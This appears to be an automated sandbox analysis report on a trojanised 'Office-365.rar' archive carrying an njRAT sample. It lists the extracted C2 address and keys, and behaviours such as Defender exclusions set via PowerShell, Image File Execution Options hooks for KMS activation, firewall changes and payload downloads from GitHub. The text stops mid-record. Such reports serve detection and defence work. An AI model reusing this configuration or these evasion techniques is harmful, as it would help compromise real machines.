Analysis
-
max time kernel
82s -
max time network
83s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
12-12-2024 18:13
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://cdn.discordapp.com/attachments/1097612223544836197/1316830236247326831/Office-365.rar?ex=675c7939&is=675b27b9&hm=88f64580fbc57e5e15fb335ded817035c026a64f2f2dfa824c029b6334369515&
Resource
win10v2004-20241007-en
General
-
Target
https://cdn.discordapp.com/attachments/1097612223544836197/1316830236247326831/Office-365.rar?ex=675c7939&is=675b27b9&hm=88f64580fbc57e5e15fb335ded817035c026a64f2f2dfa824c029b6334369515&
Malware Config
Extracted
njrat
0.7d
MPG
49.228.131.165:2422
fa6b40864b6c109adbc85023cd1f59d2
-
reg_key
fa6b40864b6c109adbc85023cd1f59d2
-
splitter
Y262SUCZ4UJJ
Signatures
-
Njrat family
-
Blocklisted process makes network request 6 IoCs
flow pid Process 33 4612 powershell.exe 37 3468 rundll32.exe 38 3468 rundll32.exe 39 1516 powershell.exe 41 2736 rundll32.exe 50 4036 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4468 powershell.exe 2736 powershell.exe 4856 powershell.exe 4704 powershell.exe 2708 powershell.exe 4612 powershell.exe 1516 powershell.exe 4036 powershell.exe -
Downloads MZ/PE file
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\KMS_ActivationInterval = "120" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\VerifierFlags = "2147483648" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe\VerifierDebug = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe\KMS_Emulation = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\KMS_RenewalInterval = "10080" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe\KMS_RenewalInterval = "10080" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\GlobalFlag = "256" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\KMS_RenewalInterval = "10080" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe\GlobalFlag = "256" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe\KMS_ActivationInterval = "120" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\VerifierDlls = "SppExtComObjHook.dll" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\KMS_Emulation = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe\VerifierFlags = "2147483648" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\KMS_ActivationInterval = "120" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe\KMS_ActivationInterval = "120" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\KMS_HWID = "4187226795851251830" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe\KMS_RenewalInterval = "10080" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\KMS_HWID = "4187226795851251830" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\VerifierDebug = "0" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe\VerifierDlls = "SppExtComObjHook.dll" reg.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 3652 netsh.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation setup.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation OfficeClickToRun.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation OfficeC2RClient.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation myprograme.exe -
Executes dropped EXE 9 IoCs
pid Process 2992 myprograme.exe 4152 Csetup.exe 1100 wininitt.exe 4564 wininitt.exe 1648 setup.exe 116 setup.exe 5588 OfficeClickToRun.exe 6004 OfficeClickToRun.exe 5996 OfficeC2RClient.exe -
Loads dropped DLL 36 IoCs
pid Process 2992 myprograme.exe 2992 myprograme.exe 3468 rundll32.exe 2736 rundll32.exe 688 Process not Found 5588 OfficeClickToRun.exe 5588 OfficeClickToRun.exe 5588 OfficeClickToRun.exe 5588 OfficeClickToRun.exe 5588 OfficeClickToRun.exe 5588 OfficeClickToRun.exe 5588 OfficeClickToRun.exe 5588 OfficeClickToRun.exe 5588 OfficeClickToRun.exe 5588 OfficeClickToRun.exe 5588 OfficeClickToRun.exe 5588 OfficeClickToRun.exe 5588 OfficeClickToRun.exe 5588 OfficeClickToRun.exe 5588 OfficeClickToRun.exe 5588 OfficeClickToRun.exe 5588 OfficeClickToRun.exe 6004 OfficeClickToRun.exe 6004 OfficeClickToRun.exe 6004 OfficeClickToRun.exe 6004 OfficeClickToRun.exe 6004 OfficeClickToRun.exe 6004 OfficeClickToRun.exe 6004 OfficeClickToRun.exe 5996 OfficeC2RClient.exe 5996 OfficeC2RClient.exe 5996 OfficeC2RClient.exe 5996 OfficeC2RClient.exe 5996 OfficeC2RClient.exe 5996 OfficeC2RClient.exe 5996 OfficeC2RClient.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 37 raw.githubusercontent.com 39 raw.githubusercontent.com 41 raw.githubusercontent.com 50 raw.githubusercontent.com 32 raw.githubusercontent.com 33 raw.githubusercontent.com -
Checks system information in the registry 2 TTPs 8 IoCs
System information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName OfficeC2RClient.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer setup.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName setup.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer OfficeClickToRun.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName OfficeClickToRun.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer OfficeClickToRun.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName OfficeClickToRun.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer OfficeC2RClient.exe -
Drops file in System32 directory 13 IoCs
description ioc Process File created C:\Windows\System32\SppExtComObjHook.dll powershell.exe File created C:\Windows\System32\SppExtComObjHook.dll powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\301034FC-816C-4335-85C0-7814CB68648E OfficeClickToRun.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db-wal OfficeClickToRun.exe File created C:\Windows\SysWOW64\D3DX9.dll myprograme.exe File opened for modification C:\Windows\System32\vcruntime143_thread.dll Csetup.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db-shm OfficeClickToRun.exe File opened for modification C:\Windows\SysWOW64\D3DX9.dll myprograme.exe File created C:\Windows\System32\vcruntime143_thread.dll powershell.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\C2RINTL.pl-pl.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\C2RINTL.ru-ru.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\C2RINTL.sv-se.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\OfficeClickToRun.exe OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\vcruntime140.dll OfficeClickToRun.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe.bak OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\api-ms-win-core-timezone-l1-1-0.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\api-ms-win-crt-environment-l1-1-0.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\api-ms-win-crt-math-l1-1-0.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\api-ms-win-crt-utility-l1-1-0.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\AppVOrchestration.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\inventory.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\C2RINTL.pt-br.dll OfficeClickToRun.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ClickToRun\msvcp140.dll.bak OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\OfficeOEMPlugin.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\api-ms-win-crt-process-l1-1-0.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\C2RINTL.nb-no.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\C2RINTL.pt-pt.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\C2RINTL.zh-tw.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\officesvcmgr.exe OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\api-ms-win-crt-heap-l1-1-0.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\C2RINTL.ko-kr.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\C2RINTL.nl-nl.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\C2RINTL.ro-ro.dll OfficeClickToRun.exe File opened for modification C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\IntegratedOffice.exe OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\SharedPerformance.man OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\api-ms-win-core-file-l1-2-0.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\AppVScripting.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\C2RINTL.bg-bg.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\C2RINTL.fr-ca.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\C2RINTL.ja-jp.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\C2RINTL.lv-lv.dll OfficeClickToRun.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ClickToRun\ApiClient.dll.bak OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\AppvIsvSubsystems64.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\C2RLicensePushConfig.xml OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\api-ms-win-core-file-l2-1-0.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\AppvIsvSubsystems32.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\C2RINTL.et-ee.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\C2RINTL.fi-fi.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\C2RINTL.th-th.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\api-ms-win-crt-locale-l1-1-0.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\api-ms-win-crt-private-l1-1-0.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\InspectorOfficeGadget.exe OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\msvcp140.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\AppVIsvStreamingManager.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\C2RINTL.en-gb.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\C2RINTL.hi-in.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\repoman.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\vccorlib140.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\api-ms-win-core-localization-l1-2-0.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\api-ms-win-core-synch-l1-2-0.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\AppvIsvSubsystems64_arm64x.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\C2RINTL.sr-latn-rs.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\SubsystemController.man OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\ucrtbase.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\api-ms-win-crt-convert-l1-1-0.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\c2r64werhandler.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\C2RINTL.lt-lt.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\api-ms-win-core-xstate-l2-1-0.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\C2RINTL.ar-sa.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\C2RINTL.cs-cz.dll OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\ClientEventLogMessages.man OfficeClickToRun.exe File created C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.18227.20162OfficeC2RF8534420-05DC-49A5-BEAF-B0E474AC75D0\FrequentOfficeUpdateSchedule.xml OfficeClickToRun.exe -
Drops file in Windows directory 5 IoCs
description ioc Process File created C:\Windows\Help\service\wininitt.exe powershell.exe File opened for modification C:\Windows\Help\service rundll32.exe File created C:\Windows\Help\service\wininitt.exe powershell.exe File opened for modification C:\Windows\Help\service\wininitt.exe rundll32.exe File opened for modification C:\Windows\Help\service rundll32.exe -
Launches sc.exe 13 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3108 sc.exe 468 sc.exe 4608 sc.exe 4996 sc.exe 1872 sc.exe 6324 sc.exe 3108 sc.exe 2028 sc.exe 664 sc.exe 3592 sc.exe 1560 sc.exe 3592 sc.exe 756 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 57 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wininitt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key 